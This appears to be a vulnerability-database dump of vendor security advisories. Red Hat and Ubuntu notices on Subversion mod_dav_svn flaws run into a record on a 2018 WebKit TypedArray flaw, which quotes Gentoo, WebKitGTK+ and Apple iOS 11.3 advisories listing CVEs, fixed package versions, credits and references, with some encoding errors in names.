Upstream acknowledges Joe Schaefer of the Apache Software Foundation as the original reporter of CVE-2011-1752; Ivan Zhakov of VisualSVN as the original reporter of CVE-2011-1783; and Kamesh Jayachandran of CollabNet, Inc. as the original reporter of CVE-2011-1921. All Subversion users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, you must restart the httpd daemon, if you are using mod_dav_svn, for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 709111 - CVE-2011-1752 subversion (mod_dav_svn): DoS (crash) via request to deliver baselined WebDAV resources 709112 - CVE-2011-1783 subversion (mod_dav_svn): DoS (excessive memory use) when configured to provide path-based access control 709114 - CVE-2011-1921 subversion (mod_dav_svn): File contents disclosure of files configured to be unreadable by those users 6. Package List: RHEL Desktop Workstation (v. 5 client): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm i386: mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm subversion-1.6.11-7.el5_6.4.i386.rpm subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm subversion-devel-1.6.11-7.el5_6.4.i386.rpm subversion-javahl-1.6.11-7.el5_6.4.i386.rpm subversion-perl-1.6.11-7.el5_6.4.i386.rpm subversion-ruby-1.6.11-7.el5_6.4.i386.rpm x86_64: mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm subversion-1.6.11-7.el5_6.4.i386.rpm subversion-1.6.11-7.el5_6.4.x86_64.rpm subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm subversion-devel-1.6.11-7.el5_6.4.i386.rpm subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm Red Hat Enterprise Linux (v. 5 server): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm i386: mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm subversion-1.6.11-7.el5_6.4.i386.rpm subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm subversion-devel-1.6.11-7.el5_6.4.i386.rpm subversion-javahl-1.6.11-7.el5_6.4.i386.rpm subversion-perl-1.6.11-7.el5_6.4.i386.rpm subversion-ruby-1.6.11-7.el5_6.4.i386.rpm ia64: mod_dav_svn-1.6.11-7.el5_6.4.ia64.rpm subversion-1.6.11-7.el5_6.4.ia64.rpm subversion-debuginfo-1.6.11-7.el5_6.4.ia64.rpm subversion-devel-1.6.11-7.el5_6.4.ia64.rpm subversion-javahl-1.6.11-7.el5_6.4.ia64.rpm subversion-perl-1.6.11-7.el5_6.4.ia64.rpm subversion-ruby-1.6.11-7.el5_6.4.ia64.rpm ppc: mod_dav_svn-1.6.11-7.el5_6.4.ppc.rpm subversion-1.6.11-7.el5_6.4.ppc.rpm subversion-1.6.11-7.el5_6.4.ppc64.rpm subversion-debuginfo-1.6.11-7.el5_6.4.ppc.rpm subversion-debuginfo-1.6.11-7.el5_6.4.ppc64.rpm subversion-devel-1.6.11-7.el5_6.4.ppc.rpm subversion-devel-1.6.11-7.el5_6.4.ppc64.rpm subversion-javahl-1.6.11-7.el5_6.4.ppc.rpm subversion-perl-1.6.11-7.el5_6.4.ppc.rpm subversion-ruby-1.6.11-7.el5_6.4.ppc.rpm s390x: mod_dav_svn-1.6.11-7.el5_6.4.s390x.rpm subversion-1.6.11-7.el5_6.4.s390.rpm subversion-1.6.11-7.el5_6.4.s390x.rpm subversion-debuginfo-1.6.11-7.el5_6.4.s390.rpm subversion-debuginfo-1.6.11-7.el5_6.4.s390x.rpm subversion-devel-1.6.11-7.el5_6.4.s390.rpm subversion-devel-1.6.11-7.el5_6.4.s390x.rpm subversion-javahl-1.6.11-7.el5_6.4.s390x.rpm subversion-perl-1.6.11-7.el5_6.4.s390x.rpm subversion-ruby-1.6.11-7.el5_6.4.s390x.rpm x86_64: mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm subversion-1.6.11-7.el5_6.4.i386.rpm subversion-1.6.11-7.el5_6.4.x86_64.rpm subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm subversion-devel-1.6.11-7.el5_6.4.i386.rpm subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm i386: mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm subversion-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-devel-1.6.11-2.el6_1.4.i686.rpm subversion-gnome-1.6.11-2.el6_1.4.i686.rpm subversion-javahl-1.6.11-2.el6_1.4.i686.rpm subversion-kde-1.6.11-2.el6_1.4.i686.rpm subversion-perl-1.6.11-2.el6_1.4.i686.rpm subversion-ruby-1.6.11-2.el6_1.4.i686.rpm noarch: subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm x86_64: mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm subversion-1.6.11-2.el6_1.4.i686.rpm subversion-1.6.11-2.el6_1.4.x86_64.rpm subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm subversion-devel-1.6.11-2.el6_1.4.i686.rpm subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm subversion-gnome-1.6.11-2.el6_1.4.i686.rpm subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm subversion-javahl-1.6.11-2.el6_1.4.i686.rpm subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm subversion-kde-1.6.11-2.el6_1.4.i686.rpm subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm subversion-perl-1.6.11-2.el6_1.4.i686.rpm subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm subversion-ruby-1.6.11-2.el6_1.4.i686.rpm subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm noarch: subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm x86_64: mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm subversion-1.6.11-2.el6_1.4.i686.rpm subversion-1.6.11-2.el6_1.4.x86_64.rpm subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm subversion-devel-1.6.11-2.el6_1.4.i686.rpm subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm subversion-gnome-1.6.11-2.el6_1.4.i686.rpm subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm subversion-javahl-1.6.11-2.el6_1.4.i686.rpm subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm subversion-kde-1.6.11-2.el6_1.4.i686.rpm subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm subversion-perl-1.6.11-2.el6_1.4.i686.rpm subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm subversion-ruby-1.6.11-2.el6_1.4.i686.rpm subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm i386: mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm subversion-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-javahl-1.6.11-2.el6_1.4.i686.rpm ppc64: mod_dav_svn-1.6.11-2.el6_1.4.ppc64.rpm subversion-1.6.11-2.el6_1.4.ppc.rpm subversion-1.6.11-2.el6_1.4.ppc64.rpm subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm s390x: mod_dav_svn-1.6.11-2.el6_1.4.s390x.rpm subversion-1.6.11-2.el6_1.4.s390.rpm subversion-1.6.11-2.el6_1.4.s390x.rpm subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm x86_64: mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm subversion-1.6.11-2.el6_1.4.i686.rpm subversion-1.6.11-2.el6_1.4.x86_64.rpm subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm subversion-javahl-1.6.11-2.el6_1.4.i686.rpm subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm i386: subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-devel-1.6.11-2.el6_1.4.i686.rpm subversion-gnome-1.6.11-2.el6_1.4.i686.rpm subversion-kde-1.6.11-2.el6_1.4.i686.rpm subversion-perl-1.6.11-2.el6_1.4.i686.rpm subversion-ruby-1.6.11-2.el6_1.4.i686.rpm noarch: subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm ppc64: subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm subversion-devel-1.6.11-2.el6_1.4.ppc.rpm subversion-devel-1.6.11-2.el6_1.4.ppc64.rpm subversion-gnome-1.6.11-2.el6_1.4.ppc.rpm subversion-gnome-1.6.11-2.el6_1.4.ppc64.rpm subversion-javahl-1.6.11-2.el6_1.4.ppc.rpm subversion-javahl-1.6.11-2.el6_1.4.ppc64.rpm subversion-kde-1.6.11-2.el6_1.4.ppc.rpm subversion-kde-1.6.11-2.el6_1.4.ppc64.rpm subversion-perl-1.6.11-2.el6_1.4.ppc.rpm subversion-perl-1.6.11-2.el6_1.4.ppc64.rpm subversion-ruby-1.6.11-2.el6_1.4.ppc.rpm subversion-ruby-1.6.11-2.el6_1.4.ppc64.rpm s390x: subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm subversion-devel-1.6.11-2.el6_1.4.s390.rpm subversion-devel-1.6.11-2.el6_1.4.s390x.rpm subversion-gnome-1.6.11-2.el6_1.4.s390.rpm subversion-gnome-1.6.11-2.el6_1.4.s390x.rpm subversion-javahl-1.6.11-2.el6_1.4.s390.rpm subversion-javahl-1.6.11-2.el6_1.4.s390x.rpm subversion-kde-1.6.11-2.el6_1.4.s390.rpm subversion-kde-1.6.11-2.el6_1.4.s390x.rpm subversion-perl-1.6.11-2.el6_1.4.s390.rpm subversion-perl-1.6.11-2.el6_1.4.s390x.rpm subversion-ruby-1.6.11-2.el6_1.4.s390.rpm subversion-ruby-1.6.11-2.el6_1.4.s390x.rpm x86_64: subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm subversion-devel-1.6.11-2.el6_1.4.i686.rpm subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm subversion-gnome-1.6.11-2.el6_1.4.i686.rpm subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm subversion-kde-1.6.11-2.el6_1.4.i686.rpm subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm subversion-perl-1.6.11-2.el6_1.4.i686.rpm subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm subversion-ruby-1.6.11-2.el6_1.4.i686.rpm subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm i386: mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm subversion-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-javahl-1.6.11-2.el6_1.4.i686.rpm x86_64: mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm subversion-1.6.11-2.el6_1.4.i686.rpm subversion-1.6.11-2.el6_1.4.x86_64.rpm subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm subversion-javahl-1.6.11-2.el6_1.4.i686.rpm subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm i386: subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-devel-1.6.11-2.el6_1.4.i686.rpm subversion-gnome-1.6.11-2.el6_1.4.i686.rpm subversion-kde-1.6.11-2.el6_1.4.i686.rpm subversion-perl-1.6.11-2.el6_1.4.i686.rpm subversion-ruby-1.6.11-2.el6_1.4.i686.rpm noarch: subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm x86_64: subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm subversion-devel-1.6.11-2.el6_1.4.i686.rpm subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm subversion-gnome-1.6.11-2.el6_1.4.i686.rpm subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm subversion-kde-1.6.11-2.el6_1.4.i686.rpm subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm subversion-perl-1.6.11-2.el6_1.4.i686.rpm subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm subversion-ruby-1.6.11-2.el6_1.4.i686.rpm subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-1752.html https://www.redhat.com/security/data/cve/CVE-2011-1783.html https://www.redhat.com/security/data/cve/CVE-2011-1921.html https://access.redhat.com/security/updates/classification/#moderate http://subversion.apache.org/security/CVE-2011-1783-advisory.txt http://subversion.apache.org/security/CVE-2011-1752-advisory.txt http://subversion.apache.org/security/CVE-2011-1921-advisory.txt 8. Contact: The Red Hat security contact is &lt;secalert@redhat.com&gt;. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFN75utXlSAg2UNWIIRAuXgAJ9fhhY1xxC7jRZbLGZA6ENr3dnTBQCgkdf0 J9nA8MJRlM/XVtyj3mbVErg= =jujC -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-1144-1 June 06, 2011 subversion vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: An attacker could send crafted input to the Subversion mod_dav_svn module for Apache and cause it to crash or gain access to restricted files. Software Description: - subversion: Advanced version control system Details: Joe Schaefer discovered that the Subversion mod_dav_svn module for Apache did not properly handle certain baselined WebDAV resource requests. (CVE-2011-1752) Ivan Zhakov discovered that the Subversion mod_dav_svn module for Apache did not properly handle certain requests. (CVE-2011-1921) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.04: libapache2-svn 1.6.12dfsg-4ubuntu2.1 Ubuntu 10.10: libapache2-svn 1.6.12dfsg-1ubuntu1.3 Ubuntu 10.04 LTS: libapache2-svn 1.6.6dfsg-2ubuntu1.3 After a standard system update you need to restart any applications that use Subversion, such as Apache when using mod_dav_svn, to make all the necessary changes
var-201804-1188 An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of TypedArray objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems. WebKit is one of the web browser engine components. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201808-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebkitGTK+: Multiple vulnerabilities Date: August 22, 2018 Bugs: #652820, #658168, #662974 ID: 201808-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.20.4 >= 2.20.4 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== All WebkitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.20.4" References ========== [ 1 ] CVE-2018-11646 https://nvd.nist.gov/vuln/detail/CVE-2018-11646 [ 2 ] CVE-2018-11712 https://nvd.nist.gov/vuln/detail/CVE-2018-11712 [ 3 ] CVE-2018-11713 https://nvd.nist.gov/vuln/detail/CVE-2018-11713 [ 4 ] CVE-2018-12293 https://nvd.nist.gov/vuln/detail/CVE-2018-12293 [ 5 ] CVE-2018-12294 https://nvd.nist.gov/vuln/detail/CVE-2018-12294 [ 6 ] CVE-2018-4101 https://nvd.nist.gov/vuln/detail/CVE-2018-4101 [ 7 ] CVE-2018-4113 https://nvd.nist.gov/vuln/detail/CVE-2018-4113 [ 8 ] CVE-2018-4114 https://nvd.nist.gov/vuln/detail/CVE-2018-4114 [ 9 ] CVE-2018-4117 https://nvd.nist.gov/vuln/detail/CVE-2018-4117 [ 10 ] CVE-2018-4118 https://nvd.nist.gov/vuln/detail/CVE-2018-4118 [ 11 ] CVE-2018-4119 https://nvd.nist.gov/vuln/detail/CVE-2018-4119 [ 12 ] CVE-2018-4120 https://nvd.nist.gov/vuln/detail/CVE-2018-4120 [ 13 ] CVE-2018-4121 https://nvd.nist.gov/vuln/detail/CVE-2018-4121 [ 14 ] CVE-2018-4122 https://nvd.nist.gov/vuln/detail/CVE-2018-4122 [ 15 ] CVE-2018-4125 https://nvd.nist.gov/vuln/detail/CVE-2018-4125 [ 16 ] CVE-2018-4127 https://nvd.nist.gov/vuln/detail/CVE-2018-4127 [ 17 ] CVE-2018-4128 https://nvd.nist.gov/vuln/detail/CVE-2018-4128 [ 18 ] CVE-2018-4129 https://nvd.nist.gov/vuln/detail/CVE-2018-4129 [ 19 ] CVE-2018-4133 https://nvd.nist.gov/vuln/detail/CVE-2018-4133 [ 20 ] CVE-2018-4146 https://nvd.nist.gov/vuln/detail/CVE-2018-4146 [ 21 ] CVE-2018-4162 https://nvd.nist.gov/vuln/detail/CVE-2018-4162 [ 22 ] CVE-2018-4163 https://nvd.nist.gov/vuln/detail/CVE-2018-4163 [ 23 ] CVE-2018-4165 https://nvd.nist.gov/vuln/detail/CVE-2018-4165 [ 24 ] CVE-2018-4190 https://nvd.nist.gov/vuln/detail/CVE-2018-4190 [ 25 ] CVE-2018-4192 https://nvd.nist.gov/vuln/detail/CVE-2018-4192 [ 26 ] CVE-2018-4199 https://nvd.nist.gov/vuln/detail/CVE-2018-4199 [ 27 ] CVE-2018-4200 https://nvd.nist.gov/vuln/detail/CVE-2018-4200 [ 28 ] CVE-2018-4201 https://nvd.nist.gov/vuln/detail/CVE-2018-4201 [ 29 ] CVE-2018-4204 https://nvd.nist.gov/vuln/detail/CVE-2018-4204 [ 30 ] CVE-2018-4214 https://nvd.nist.gov/vuln/detail/CVE-2018-4214 [ 31 ] CVE-2018-4218 https://nvd.nist.gov/vuln/detail/CVE-2018-4218 [ 32 ] CVE-2018-4222 https://nvd.nist.gov/vuln/detail/CVE-2018-4222 [ 33 ] CVE-2018-4232 https://nvd.nist.gov/vuln/detail/CVE-2018-4232 [ 34 ] CVE-2018-4233 https://nvd.nist.gov/vuln/detail/CVE-2018-4233 [ 35 ] CVE-2018-4261 https://nvd.nist.gov/vuln/detail/CVE-2018-4261 [ 36 ] CVE-2018-4262 https://nvd.nist.gov/vuln/detail/CVE-2018-4262 [ 37 ] CVE-2018-4263 https://nvd.nist.gov/vuln/detail/CVE-2018-4263 [ 38 ] CVE-2018-4264 https://nvd.nist.gov/vuln/detail/CVE-2018-4264 [ 39 ] CVE-2018-4265 https://nvd.nist.gov/vuln/detail/CVE-2018-4265 [ 40 ] CVE-2018-4266 https://nvd.nist.gov/vuln/detail/CVE-2018-4266 [ 41 ] CVE-2018-4267 https://nvd.nist.gov/vuln/detail/CVE-2018-4267 [ 42 ] CVE-2018-4270 https://nvd.nist.gov/vuln/detail/CVE-2018-4270 [ 43 ] CVE-2018-4272 https://nvd.nist.gov/vuln/detail/CVE-2018-4272 [ 44 ] CVE-2018-4273 https://nvd.nist.gov/vuln/detail/CVE-2018-4273 [ 45 ] CVE-2018-4278 https://nvd.nist.gov/vuln/detail/CVE-2018-4278 [ 46 ] CVE-2018-4284 https://nvd.nist.gov/vuln/detail/CVE-2018-4284 [ 47 ] WebKitGTK+ Security Advisory WSA-2018-0003 https://webkitgtk.org/security/WSA-2018-0003.html [ 48 ] WebKitGTK+ Security Advisory WSA-2018-0004 https://webkitgtk.org/security/WSA-2018-0004.html [ 49 ] WebKitGTK+ Security Advisory WSA-2018-0005 https://webkitgtk.org/security/WSA-2018-0005.html [ 50 ] WebKitGTK+ Security Advisory WSA-2018-0006 https://webkitgtk.org/security/WSA-2018-0006.html Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201808-04 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . ------------------------------------------------------------------------ WebKitGTK+ Security Advisory WSA-2018-0003 ------------------------------------------------------------------------ Date reported : April 04, 2018 Advisory ID : WSA-2018-0003 Advisory URL : https://webkitgtk.org/security/WSA-2018-0003.html CVE identifiers : CVE-2018-4101, CVE-2018-4113, CVE-2018-4114, CVE-2018-4117, CVE-2018-4118, CVE-2018-4119, CVE-2018-4120, CVE-2018-4122, CVE-2018-4125, CVE-2018-4127, CVE-2018-4128, CVE-2018-4129, CVE-2018-4133, CVE-2018-4146, CVE-2018-4161, CVE-2018-4162, CVE-2018-4163, CVE-2018-4165. Several vulnerabilities were discovered in WebKitGTK+. Credit to Yuan Deng of Ant-financial Light-Year Security Lab. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to OSS-Fuzz. Impact: Unexpected interaction with indexing types causing an ASSERT failure. Description: An array indexing issue existed in the handling of a function in JavaScriptCore. This issue was addressed through improved checks. Credit to OSS-Fuzz. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to an anonymous researcher. Impact: A malicious website may exfiltrate data cross-origin. Description: A cross-origin issue existed with the fetch API. This was addressed through improved input validation. Credit to Jun Kokatsu (@shhnjk). Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to an anonymous researcher working with Trend Microys Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to an anonymous researcher working with Trend Microys Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Zach Markley. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to likemeng of Baidu Security Lab working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Anton Lopanitsyn of Wallarm, Linus Sarud of Detectify (detectify.com), Yuji Tounai of NTT Communications Corporation. Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack. This issue was addressed with improved URL validation. Credit to OSS-Fuzz. Impact: Processing maliciously crafted web content may lead to a denial of service. Description: A memory corruption issue was addressed through improved input validation. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Description: Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html The WebKitGTK+ team, April 04, 2018 . CVE-2018-4117: an anonymous researcher, an anonymous researcher Installation note: Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2018-3-29-1 iOS 11.3 iOS 11.3 is now available and addresses the following: Clock Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to see the email address used for iTunes Description: An information disclosure issue existed in the handling of alarms and timers. CVE-2018-4123: Zaheen Hafzar M M (@zaheenhafzer) CoreFoundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4155: Samuel GroA (@5aelo) CVE-2018-4158: Samuel GroA (@5aelo) CoreText Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted string may lead to a denial of service Description: A denial of service issue was addressed through improved memory handling. CVE-2018-4142: Robin Leroy of Google Switzerland GmbH File System Events Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4167: Samuel GroA (@5aelo) Files Widget Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: File Widget may display contents on a locked device Description: The File Widget was displaying cached data when in the locked state. CVE-2018-4168: Brandon Moore Find My iPhone Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to the device may be able to disable Find My iPhone without entering an iCloud password Description: A state management issue existed when restoring from a back up. CVE-2018-4172: Viljami VastamA$?ki iCloud Drive Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4151: Samuel GroA (@5aelo) Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4150: an anonymous researcher Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4104: The UK's National Cyber Security Centre (NCSC) Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4143: derrek (@derrekr6) Mail Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to intercept the contents of S/MIME-encrypted e-mail Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4174: an anonymous researcher, an anonymous researcher NSURLSession Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4166: Samuel GroA (@5aelo) PluginKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to 